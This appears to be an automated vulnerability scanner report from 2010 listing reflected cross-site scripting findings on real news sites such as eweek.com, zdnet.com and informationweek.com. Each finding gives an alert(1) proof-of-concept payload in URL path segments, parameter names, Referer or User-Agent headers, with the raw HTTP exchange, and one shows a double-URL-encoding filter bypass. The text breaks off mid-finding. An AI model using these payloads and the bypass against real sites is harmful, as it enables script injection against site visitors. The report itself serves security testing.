HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:06:23 GMT Server: Apache/2.2.8 (Fedora) X-Powered-By: PHP/5.1.6 Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=0isus4u5km09uodlel5osh5802; expires=Mon, 03 Jan 2011 05:39:43 GMT; path=/; domain=.webpronews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 11 Dec 2010 02:06:23 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 38577
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58237"><script>alert(1)</script>3d657a38bba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2009/0558237"><script>alert(1)</script>3d657a38bba/26/online-brand-fraud-poses-challenge-to-marketers HTTP/1.1 Host: www.webpronews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:06:24 GMT Server: Apache/2.2.8 (Fedora) X-Powered-By: PHP/5.1.6 Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=1hbonqqsg67bmip30d95akt497; expires=Mon, 03 Jan 2011 05:39:44 GMT; path=/; domain=.webpronews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 11 Dec 2010 02:06:24 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 38577
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a7d5"><script>alert(1)</script>4b098b55187 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2009/05/264a7d5"><script>alert(1)</script>4b098b55187/online-brand-fraud-poses-challenge-to-marketers HTTP/1.1 Host: www.webpronews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:06:26 GMT Server: Apache/2.2.8 (Fedora) X-Powered-By: PHP/5.1.6 Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=a3r5lbbjp99epv99uul3nd2b75; expires=Mon, 03 Jan 2011 05:39:46 GMT; path=/; domain=.webpronews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 11 Dec 2010 02:06:26 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 38577
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39257"><script>alert(1)</script>17fc4b818e8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers39257"><script>alert(1)</script>17fc4b818e8 HTTP/1.1 Host: www.webpronews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:06:28 GMT Server: Apache/2.2.8 (Fedora) X-Powered-By: PHP/5.1.6 Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=3hlm4d1rmo6m85bbqsi6qsm654; expires=Mon, 03 Jan 2011 05:39:48 GMT; path=/; domain=.webpronews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 11 Dec 2010 02:06:28 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 38603
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
1.220. http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d26d5</script><script>alert(1)</script>53c1268f75f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5</script><script>alert(1)</script>53c1268f75f=1 HTTP/1.1 Host: www.webpronews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:06:21 GMT Server: Apache/2.2.8 (Fedora) X-Powered-By: PHP/5.1.6 Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=vv3id7vuvl6650dm0fqt88kt11; expires=Mon, 03 Jan 2011 05:39:41 GMT; path=/; domain=.webpronews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 11 Dec 2010 02:06:21 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 41747
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
1.221. http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2aec7"><script>alert(1)</script>df1a9b4e482 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?2aec7"><script>alert(1)</script>df1a9b4e482=1 HTTP/1.1 Host: www.webpronews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:06:14 GMT Server: Apache/2.2.8 (Fedora) X-Powered-By: PHP/5.1.6 Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=3jv2a1chmc1sg3lcumrnlibj85; expires=Mon, 03 Jan 2011 05:39:34 GMT; path=/; domain=.webpronews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 11 Dec 2010 02:06:14 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 41710
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
1.222. http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae5ca"><script>alert(1)</script>da955ce7746 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?ae5ca"><script>alert(1)</script>da955ce7746=1 HTTP/1.1 Host: www.webpronews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:06:15 GMT Server: Apache/2.2.8 (Fedora) X-Powered-By: PHP/5.1.6 Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=stud65spqqgd3rmttti27bupi3; expires=Mon, 03 Jan 2011 05:39:35 GMT; path=/; domain=.webpronews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 11 Dec 2010 02:06:15 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 41710
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1f3a8%253cscript%253ealert%25281%2529%253c%252fscript%253e3be8215413d was submitted in the REST URL parameter 1. This input was echoed as 1f3a8<script>alert(1)</script>3be8215413d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /legal1f3a8%253cscript%253ealert%25281%2529%253c%252fscript%253e3be8215413d/index.dhtml HTTP/1.1 Host: www.worldsite.ws Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.7.65 Date: Sat, 11 Dec 2010 02:06:13 GMT Content-Type: text/html Connection: close Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT Pragma: no-cache Content-Length: 4574
<html><head><title>The Internet Land Rush is On! | GDI, Inc.</title>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ece41'-alert(1)-'48cc01aaf9e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/security/hundreds-of-high-profile-sites-unprotected-from-domain-hijacking/6248ece41'-alert(1)-'48cc01aaf9e HTTP/1.1 Host: www.zdnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <me ...[SNIP]... <script type="text/javascript"> (function() { var toolbar = new CNB.Toolbar('toolbar-163963', { 'cid': '163963', 'serviceCid': 'zdsecurity_6248ece41'-alert(1)-'48cc01aaf9e', 'title': 'Hundreds of high profile sites unprotected from domain hijacking', 'summary': 'A MarkMonitor review indicates that less than 10% of the top 300 high trafficked sites have a ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d607f"-alert(1)-"8ea1a64c36b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article2/0,1895,2135433,00.asp HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=d607f"-alert(1)-"8ea1a64c36b
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83f60"><script>alert(1)</script>a4e90e3d887 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /article2/0,1895,2135433,00.asp HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=83f60"><script>alert(1)</script>a4e90e3d887
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 658ec"-alert(1)-"c598543247b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/a/Midmarket/Another-Phishing-Scam-Targets-Facebook-Users-165926/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=658ec"-alert(1)-"c598543247b
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0b40"><script>alert(1)</script>90695f5830c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c/a/Midmarket/Another-Phishing-Scam-Targets-Facebook-Users-165926/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=e0b40"><script>alert(1)</script>90695f5830c
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf9d4"><script>alert(1)</script>10929f56639 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c/a/Midmarket/Facebook-Targeted-in-Spam-Scam-603252/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=bf9d4"><script>alert(1)</script>10929f56639
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2eb2"-alert(1)-"5d00cdea555 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/a/Midmarket/Facebook-Targeted-in-Spam-Scam-603252/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=e2eb2"-alert(1)-"5d00cdea555
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1d23"-alert(1)-"2b095ae0922 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/a/Security/Phishers-Increase-Abuse-of-Specific-TopLevel-Domains/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=c1d23"-alert(1)-"2b095ae0922
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f94a5"><script>alert(1)</script>cc15a419565 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c/a/Security/Phishers-Increase-Abuse-of-Specific-TopLevel-Domains/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=f94a5"><script>alert(1)</script>cc15a419565
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4a8c"-alert(1)-"35e1acee13 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/internet/policy/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c4a8c"-alert(1)-"35e1acee13 Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:22 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:22 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=XN3FHZ1EQVL45QE1GHRSKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32420
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c4a8c"-alert(1)-"35e1acee13"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b61a"-alert(1)-"740fef0d6c2 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/internet/security/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1b61a"-alert(1)-"740fef0d6c2 Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:22 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:22 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=2WWASGL3EQNA3QE1GHOSKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32475
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1b61a"-alert(1)-"740fef0d6c2"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93b34"-alert(1)-"6baaf5739c4 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/internet/social_network/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)93b34"-alert(1)-"6baaf5739c4 Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:22 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:22 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=UTR3BG5LYRNZZQE1GHOSKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32371
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)93b34"-alert(1)-"6baaf5739c4"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38f49"-alert(1)-"16257ad9e05 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/security/government/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)38f49"-alert(1)-"16257ad9e05 Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:22 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:22 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=PJWSNHEL3ETJLQE1GHPSKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32315
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)38f49"-alert(1)-"16257ad9e05"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dac0"-alert(1)-"9c7391968ee was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
